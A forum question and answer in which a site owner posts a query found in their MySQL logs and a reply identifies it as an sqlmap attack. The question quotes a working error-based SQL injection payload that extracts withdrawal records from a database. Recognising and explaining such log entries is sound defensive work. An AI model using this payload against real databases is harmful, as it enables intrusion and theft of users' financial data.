Mysql Injection query?

Question

SELECT `u`.`login`,`u`.`fullname`,`ur`.`user_id`,`ur`.`refer_id` 
FROM 
`user_referrals` AS `ur` 
 JOIN 
(SELECT id,login,fullname FROM users WHERE id=4  
 AND 
(SELECT 3039 FROM 
(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT 
MID((IFNULL(CAST(id AS CHAR),0x20)),1,54) 
 FROM 
 cms_withdrawal WHERE user_id=3454 and timestamp>1494075125 LIMIT 
1,1),0x7176716271,FLOOR(RAND(0)*2))x 
FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) AS `u`  
WHERE (ur.user_id=4135 AND ur.refer_id=4 AND (SELECT 3039 
FROM
(SELECT COUNT(*),CONCAT(0x7170707a71,(SELECT MID((IFNULL(CAST(id AS 
CHAR),0x20)),1,54) FROM cms_withdrawal WHERE user_id=3454 and 
timestamp>1494075125 LIMIT 1,1),0x7176716271,FLOOR(RAND(0)*2))x  
FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) OR (ur.refer_id=4135 AND 
ur.user_id=4 AND (SELECT 3039 FROM(SELECT COUNT(*),CONCAT(0x7170707a71,
(SELECT MID((IFNULL(CAST(id AS CHAR),0x20)),1,54) 
FROM cms_withdrawal WHERE 
user_id=3454 and timestamp>1494075125 LIMIT 
1,1),0x7176716271,FLOOR(RAND(0)*2))x 
FROM 
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)) AND ur.level=1 LIMIT 1

I see it in my mysql logs. What is that?

Answer 1

That query is part of an sqlmap attack. Sqlmap is used for penetration-testing (hacking) purposes.

In this issue you can see that the code is part of what they use in their statements >> http://github.com/sqlmapproject/sqlmap/issues/209

sqlmap: http://github.com/sqlmapproject/sqlmap